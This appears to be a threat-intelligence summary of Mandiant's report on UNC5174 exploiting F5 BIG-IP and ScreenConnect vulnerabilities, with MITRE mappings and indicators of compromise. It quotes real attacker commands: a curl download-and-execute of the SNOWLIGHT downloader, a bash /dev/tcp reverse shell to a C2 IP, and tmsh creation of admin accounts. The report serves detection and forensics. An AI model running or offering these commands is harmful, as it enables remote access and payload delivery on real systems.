Bringing Access Back — Initial Access Brokers Exploit F5 BIG-IP (CVE-2023-46747) and ScreenConnect

Mandiant attributes exploitation of F5 BIG-IP CVE-2023-46747 and ConnectWise ScreenConnect CVE-2024-1709 to UNC5174, which used unauthenticated TMUI access to create admin users and execute bash commands, then deployed an in-memory downloader (SNOWLIGHT) that fetched and executed GOHEAVY and other tooling. The actor performed internal reconnaissance, tunneling, and reverse shells while sometimes self-patching appliances; forensic artifacts include audit logs, created user accounts, filenames, IPs, and multiple ELF hashes. #UNC5174 #SNOWLIGHT

Keypoints

UNC5174 exploited CVE-2023-46747 (F5 BIG-IP TMUI) and CVE-2024-1709 (ConnectWise ScreenConnect) to gain unauthenticated admin access and add accounts.
Compromised F5 appliances show admin account creation, bash command execution via tmsh, and corresponding /etc/passwd and /etc/shadow entries.
Actor downloaded and launched a Linux ELF downloader named SNOWLIGHT (/tmp/watchsys) which fetches and XOR-decodes secondary payloads in-memory using memfd/fexecve.
SNOWLIGHT delivered GOHEAVY (Golang tunneler) and GOREVERSE reverse shell; GOHEAVY broadcasts “SpotUdp” and opens many local UDP ports for covert comms and lateral discovery.
Internal reconnaissance used tooling fetched to /tmp/ss (likely FSCAN) to scan internal subnets; actors issued bash/netcat reverse shells to C2 addresses over TCP/443.
IOC set includes specific C2 IPs, a SUPERSHELL C2 URL, multiple ELF MD5 hashes, filenames, and unauthorized user account names observed on victims.

MITRE Techniques

[T1190] Exploit Public-Facing Application – Used to gain initial access by exploiting F5 BIG-IP and ScreenConnect vulnerabilities (‘Exploit Public-Facing Application’)
[T1027] Obfuscated Files or Information – Actors used obfuscation and GOBFUSCATE on GOHEAVY and XOR encoding on payloads (‘Obfuscated Files or Information’)
[T1070.004] File Deletion – Actors removed prior artifacts and deleted files like temporary binaries (‘File Deletion’)
[T1140] Deobfuscate/Decode Files or Information – SNOWLIGHT XOR-decodes secondary ELF payloads with key 0x99 (‘XOR decoded using the key “0x99″‘)
[T1222.002] Linux and Mac File and Directory Permissions Modification – Actors changed permissions on downloaded tools (chmod 755 /tmp/watchsys) (‘Modify permissions of /tmp/watchsys’)
[T1601.001] Patch System Image – Actor executed mitigation.sh to self-patch the appliance after compromise (‘ran command … /root/mitigation.sh -u’)
[T1016] System Network Configuration Discovery – Internal scanning and network reconnaissance were performed from the appliance (‘scan internal subnet ranges’)
[T1049] System Network Connections Discovery – Actor enumerated network connections and used tools to discover reachable hosts (‘System Network Connections Discovery’)
[T1082] System Information Discovery – Commands and tooling gathered system information from compromised appliances (‘System Information Discovery’)
[T1083] File and Directory Discovery – Actors listed directories and searched filesystem artifacts (ls -al /tmp/) (‘File and Directory Discovery’)
[T1095] Non-Application Layer Protocol – Reverse shells and custom C2 over raw TCP/443 and UDP tunneling observed (‘Non-Application Layer Protocol’)
[T1105] Ingress Tool Transfer – Tools (SNOWLIGHT, GOHEAVY, GOREVERSE, ss) were transferred to victim (/tmp/watchsys, /tmp/ss) (‘Download the file from a remote URL to /tmp/watchsys’)
[T1572] Protocol Tunneling – GOHEAVY established tunneling behavior and protocol encapsulation for C2 and lateral comms (‘Protocol Tunneling’)
[T1573.002] Asymmetric Cryptography – Use of cryptographic material and certificate considerations observed in remediation guidance (‘Install Digital Certificate’ / certificate re-issue guidance)
[T1059] Command and Scripting Interpreter – Actors executed shell commands via tmsh run util bash and used shell interpreters for payloads (‘run util bash -c “…”‘)
[T1059.004] Unix Shell – Specific use of Unix shell for reverse shells and command execution (bash -i /dev/tcp/… ) (‘bash -i /dev/tcp/172.104.124.74/443 0>&1 &’)
[T1136.001] Local Account – Unauthorized local admin accounts were created (f5support3, F5_admin, f5_support) for persistence (‘create auth user f5support3’)
[T1531] Account Access Removal – Actors deleted users and attempted account cleanup (deleted user root6) (‘deleted user root6’)
[T1003.008] /etc/passwd and /etc/shadow – Creation and modification of OS credential stores observed (entries in /etc/passwd and /etc/shadow) (‘/etc/passwd’, ‘/etc/shadow’)
[T1608.003] Install Digital Certificate – Indicators and remediation suggested revoking/reissuing certificates post-compromise (‘revoke and re-issue sensitive cryptographic material’)

Indicators of Compromise

[IP Address] C2 and attacker hosts – 172.104.124.74 (observed as active C2 and used for payload hosting), 172.245.68.110 (SUPERSHELL C2), and other IPs (118.140.151.242, 61.239.68.73).
[URL] SUPERSHELL C2 and payload hosting – http://172.245.68[.]110:8888 (SUPERSHELL C2), http://172.104.124[.]74/LG (SNOWLIGHT download URL).
[Filename] Downloaded tooling and temporary files – /tmp/watchsys (SNOWLIGHT downloader), /tmp/ss (recon/scanner tool), and other temporary binaries used for execution.
[User Account] Unauthorized admin accounts observed – local/f5support3 (created via TMUI and used to execute bash), cvetest (added to ScreenConnect instances).
[File Hashes] ELF malware hashes – c867881c56698f938b4e8edafe76a09b (LG/SNOWLIGHT), 0951109dd1be0d84a33d52c135ba9c97 (SNOWLIGHT), and 4 other SNOWLIGHT-related MD5 hashes.
[Commands / Artifacts] tmsh and REST audit entries – examples include “create auth user f5support3 … shell bash” and “run util bash -c ‘curl -o /tmp/watchsys http://172.104.124.74/LG;chmod 755 /tmp/watchsys;nohup /tmp/watchsys &;’”.

UNC5174 exploited F5 BIG-IP TMUI (CVE-2023-46747) using unauthenticated request smuggling to create administrative TMUI users and then invoked tmsh run util bash to execute shell commands; audit logs (/var/log/audit and /var/log/restjavad-audit.log) show creation of accounts (e.g., f5support3), corresponding /etc/passwd and /etc/shadow entries, and POSTs to /mgmt/tm/util/bash from attacker IPs. Once access was achieved, operators cleaned prior artifacts, downloaded a Linux ELF downloader to /tmp/watchsys via curl, set execute permissions and launched it (curl -o /tmp/watchsys http://172.104.124.74/LG; chmod 755 /tmp/watchsys; nohup /tmp/watchsys &).

SNOWLIGHT (the downloader) connects to hard-coded C2 over TCP/443 using raw sockets, implements a binary protocol (one variant uses a fake HTTP header), XOR-decodes a secondary ELF with key 0x99, and loads that payload directly into memory using memfd_create and fexecve — leaving a memfd:a (deleted) process with no on-disk path. The in-memory payloads observed include GOHEAVY (Golang tunneler obfuscated with GOBFUSCATE) which opens many local UDP ports, broadcasts “SpotUdp” to network interfaces for peer discovery, and maintains concurrent comms to SUPERSHELL infrastructure; actors also deployed GOREVERSE and used bash/netcat reverse shells (bash -i /dev/tcp/172.104.124.74/443 0>&1 &) for C2 connectivity.

From compromised appliances the actor fetched additional reconnaissance tooling (saved as /tmp/ss and likely leveraging FSCAN) to scan internal CIDR ranges and pivot, executed commands to list and modify files/directories, and attempted to self-patch the vulnerable TMUI using F5’s mitigation.sh to deny subsequent opportunistic access. ScreenConnect (CVE-2024-1709) exploitation followed a similar pattern of adding admin accounts (e.g., cvetest) across many instances. Forensics should prioritize tmsh and REST audit logs, created local accounts, memfd process artifacts, download URLs/IPs (172.104.124.74, 172.245.68.110), and the SNOWLIGHT/GOHEAVY/GOREVERSE ELF hashes when investigating potential compromise.

Bringing Access Back — Initial Access Brokers Exploit F5 BIG-IP (CVE-2023-46747) and ScreenConnect | Mandiant